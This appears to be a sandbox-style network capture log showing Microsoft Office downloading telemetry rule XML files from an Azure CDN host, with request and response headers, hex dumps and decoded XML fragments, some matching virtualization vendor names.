                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:03 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                        x-ms-request-id: 4c860516-801e-00a3-3252-437cfb000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063903Z-174f7845968cpnpfhC1EWR3afc00000013mg00000000b4gr
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:03 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        66192.168.2.84987013.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:04 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:04 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:04 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                        x-ms-request-id: 3f63c6b9-401e-0064-499d-4354af000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063904Z-174f7845968vqt9xhC1EWRgten000000140g00000000by66
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:04 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        67192.168.2.84987113.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:05 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:05 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                        x-ms-request-id: 09dbda49-a01e-003d-2d45-4098d7000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063905Z-174f7845968frfdmhC1EWRxxbw000000141g00000000a194
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:05 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        68192.168.2.84987213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:05 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:05 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:05 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                        x-ms-request-id: b1291b2a-001e-0028-31ae-43c49f000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063905Z-174f7845968qj8jrhC1EWRh41s00000013w000000000g3c9
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:05 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        69192.168.2.84987313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:05 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:05 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                        x-ms-request-id: 27481374-801e-0078-46b4-42bac6000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063905Z-174f7845968swgbqhC1EWRmnb4000000144g00000000b18z
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:05 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        70192.168.2.84987413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:05 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:06 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:06 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                        x-ms-request-id: a15be10d-401e-0029-636c-439b43000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063906Z-174f78459685m244hC1EWRgp2c0000001400000000000r35
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:06 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        71192.168.2.84987513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:06 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:07 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:06 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                        x-ms-request-id: ce20f954-a01e-006f-7a27-4413cd000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063906Z-174f78459685726chC1EWRsnbg00000014600000000024k5
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:07 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        72192.168.2.84987713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:07 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:07 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 411
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                        x-ms-request-id: 4d2a6959-e01e-0085-41b2-42c311000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063907Z-174f7845968glpgnhC1EWR7uec00000014a00000000014px
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:08 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        73192.168.2.84987613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:07 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:08 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:08 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 485
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                        x-ms-request-id: e579458c-401e-0064-1dbd-4254af000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063908Z-174f78459685m244hC1EWRgp2c00000013yg00000000325b
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:08 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        74192.168.2.84987813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:07 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:08 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 470
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                        x-ms-request-id: 6dbf519d-601e-0084-1b91-3f6b3f000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063908Z-174f78459685m244hC1EWRgp2c0000001400000000000r4s
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
